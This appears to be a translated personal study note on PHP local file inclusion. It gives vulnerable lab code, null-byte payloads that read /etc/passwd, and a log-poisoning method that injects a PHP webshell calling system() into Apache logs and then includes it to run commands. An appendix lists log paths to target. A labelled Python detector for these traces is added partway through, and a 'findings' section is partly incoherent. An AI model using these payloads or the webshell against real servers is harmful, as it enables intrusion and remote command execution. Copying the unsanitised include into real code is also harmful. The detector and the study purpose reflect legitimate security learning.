The main reference of this study is: http://downloads.ackack.net/LocalFileInclusion.pdf
Lab code:
On Linux, directly submit: test.php?for=/etc/passwd%00 to display the file.
<?php
include($_GET['for'] . '.php'); // used to test the local file inclusion vulnerability
?>
On Windows, submit: test.php?for=D:\tools\readme.txt%00. Note that when there are too many "..\", 360 will automatically intercept the request; the better way is to use IE or Firefox.
However, browsing files alone is not enough; we also need a webshell. The log injection method can be used for this. It is the main purpose of these notes and the key point.
Here, the core of the idea is to inject PHP code into the log. For example, we can inject:
<?php $s = $_GET; @chdir($s['x']); echo @system($s['y']) ?>
using Fiddler2 (the browser's automatic changes are too annoying). Note: Fiddler2 does not filter access to the local machine. I will enter the address of the local machine: 192.168.0.1.
Then access: test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname, which is for Linux. If the platform is Windows, access: test.php?for=..\apache\logs\error.log%00&x=.&y=dir, and the files in the current directory are displayed.
Of course, the code can also be recorded in access.log, but that is more complicated, because the file to be included will be larger.
The reference also mentions a /proc/self/fd injection method on Linux. I am not familiar with it, so I have not looked at it carefully. I will learn more when I need it later.
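A defensive counterpart to the log injection steps above, added here as an example and not taken from the original post or its reference: a Python scan of Apache log lines for the traces this technique leaves (PHP tags stored in the log, a %00 null byte, and a parameter that points at a log file or /proc/self/). The sample lines, the finding names and the functions classify and scan are constructed for this illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r"<\?(?:php|=|\s)", re.IGNORECASE)
LOG_PATH_RE = re.compile(r"(?:access|error)[._]log|/proc/self/", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")

# Constructed sample lines (access-log and error-log style), not real traffic.
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    r'192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /test.php?for=/etc/passwd%00 HTTP/1.1" 200 1024',
    r'[Mon Jan 01 10:00:05 2024] [error] [client 192.0.2.10] File does not exist: /var/www/<?php /* placeholder */ ?>',
    r'192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname HTTP/1.1" 200 2048',
    r'192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /test.php?for=..\\apache\\logs\\error.log%00&x=.&y=dir HTTP/1.1" 200 2048',
]


def classify(line):
    """Return the set of findings for one Apache log line."""
    findings = set()
    # PHP code stored in any logged field means the log file is poisoned;
    # decode first so a percent-encoded attempt is flagged as well.
    if PHP_TAG_RE.search(unquote(line)):
        findings.add("php-code-in-log")
    match = REQUEST_RE.search(line)
    if not match:
        return findings
    raw_query = match.group(1).partition("?")[2]
    # A raw %00 is the null-byte truncation used to drop the ".php" suffix.
    if "%00" in raw_query:
        findings.add("null-byte")
    for _name, value in parse_qsl(raw_query, keep_blank_values=True):
        if TRAVERSAL_RE.search(value):
            findings.add("path-traversal")
        if LOG_PATH_RE.search(value):
            findings.add("log-file-as-parameter")
    return findings


def scan(lines):
    """Return (line number, sorted findings) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, sorted(findings)))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

A line flagged php-code-in-log together with a later request flagged log-file-as-parameter is the pairing to alert on, since it matches the inject-then-include sequence described above.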
Additional findings:
The 360 browser has a strange feature. When accessing Program files\360se\tools to see if there is any such folder, is there a problem here? TDH
D:\Program files\360se\360se3\http:\apache\logs\error.log%00&y=dir and http://192.168.0.1:88/test.php?for=...\..\apache\logs\error.log%00&y=dir. How is the relationship between the two obtained?
Appendix:
1. Possible log paths:
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
From http://kingbase.org